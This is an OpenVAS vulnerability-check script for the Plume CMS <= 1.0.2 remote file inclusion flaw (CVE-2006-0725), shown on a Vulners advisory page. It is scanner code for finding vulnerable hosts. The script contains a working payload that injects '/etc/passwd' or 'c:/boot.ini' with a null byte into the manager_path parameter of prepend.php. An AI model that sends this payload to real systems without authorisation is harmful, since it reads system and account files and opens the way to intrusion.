Lucene search
K

Plume CMS <= 1.0.2 Remote File Inclusion Vulnerability

🗓️ 26 Mar 2006 00:00:00Reported by This script is Copyright (C) 2006 Ferdy RiphagenType 
openvas
 openvas
🔗 plugins.openvas.org👁 18 Views

The Plume CMS <= 1.0.2 is prone to file inclusion attacks due to unsanitized input in the '_PX_config[manager_path]' parameter in the 'prepend.php' file, potentially allowing arbitrary file inclusion and code execution

Related
Refs
Code
ReporterTitlePublishedViews
Family
Check Point Advisories
Update Protection against Plume CMS manager_path Code Execution Vulnerability
16 Jul 200600:00
checkpoint_advisories
CVE
CVE-2006-0725
16 Feb 200611:00
cve
Cvelist
CVE-2006-0725
16 Feb 200611:00
cvelist
EUVD
EUVD-2006-0732
7 Oct 202500:30
euvd
NVD
CVE-2006-0725
16 Feb 200611:02
nvd
OpenVAS
Plume CMS <= 1.0.2 Remote File Inclusion Vulnerability
26 Mar 200600:00
openvas
Tenable Nessus
Plume CMS < 1.0.3 Remote File Inclusion
23 Feb 200600:00
nessus
Prion
Remote file inclusion
16 Feb 200611:02
prion
Prion
Remote file inclusion
30 May 200610:02
prion
# OpenVAS Vulnerability Test
# $Id: plumecms_prepend_file_inclusion.nasl 5783 2017-03-30 09:03:43Z cfi $
# Description: Plume CMS <= 1.0.2 Remote File Inclusion Vulnerability
#
# Authors:
# Ferdy Riphagen <f[dot]riphagen[at]nsec[dot]nl>
#
# Copyright:
# Copyright (C) 2006 Ferdy Riphagen
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

tag_summary = "The remote host is running a PHP application that is prone
to local and remote file inclusion attacks. 

Description :

The system is running Plume CMS a simple but powerful 
content management system.

The version installed does not sanitize user input in the
'_PX_config[manager_path]' parameter in the 'prepend.php' file.
This allows an attacker to include arbitrary files and execute code
on the system.

This flaw is exploitable if PHP's register_globals is enabled.";

tag_solution = "Either sanitize the prepend.php
file as advised by the developer (see first URL) or 
upgrade to Plume CMS version 1.0.3 or later";

if(description)
{
 script_id(20972);
 script_version("$Revision: 5783 $");
 script_tag(name:"last_modification", value:"$Date: 2017-03-30 11:03:43 +0200 (Thu, 30 Mar 2017) $");
 script_tag(name:"creation_date", value:"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)");
 script_tag(name:"cvss_base", value:"6.8");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
 script_cve_id("CVE-2006-0725");
 script_bugtraq_id(16662);
 script_xref(name:"OSVDB", value:"23204");
 script_name("Plume CMS <= 1.0.2 Remote File Inclusion Vulnerability");
 script_category(ACT_ATTACK);
 script_tag(name:"qod_type", value:"remote_vul");
 script_family("Web application abuses");
 script_copyright("This script is Copyright (C) 2006 Ferdy Riphagen");
 script_dependencies("find_service.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "summary" , value : tag_summary);
 script_xref(name : "URL" , value : "http://www.plume-cms.net/news/77-Security-Notice-Please-Update-Your-Prependphp-File");
 script_xref(name : "URL" , value : "http://secunia.com/advisories/18883/");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("global_settings.inc");

port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);

foreach dir( make_list_unique( "/plume", "/cms", "/", cgi_dirs( port:port ) ) ) {

 if( dir == "/" ) dir = "";
 res = http_get_cache(item:string(dir, "/index.php"), port:port); 
 if(res == NULL) continue;

 if(egrep(pattern:'<a href=[^>]+.*alt="powered by PLUME CMS', string:res)) {

  # Try to grab a local file.
  file[0] = "/etc/passwd";
  file[1] = "c:/boot.ini";

  for(test = 0; file[test]; test++) {

   url = string(dir, "/prepend.php?_PX_config[manager_path]=", file[test], "%00");
   req = http_get(item:url, port:port); 
   recv = http_keepalive_send_recv(data:req, bodyonly:TRUE, port:port);
   if (!recv) continue;

   if (egrep(pattern:"root:.*:0:[01]:.*:", string:recv) ||
       egrep(pattern:"default=multi.*disk.*partition", string:recv) ||
       # And if magic_quotes_gpc = on, check for error messages.
       egrep(pattern:"Warning.+\([^>]+\\0/conf/config\.php.+failed to open stream", string:recv)) {
     report = report_vuln_url( port:port, url:url );
     security_message( port:port, data:report );
     exit( 0 );
   }
  }
 }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation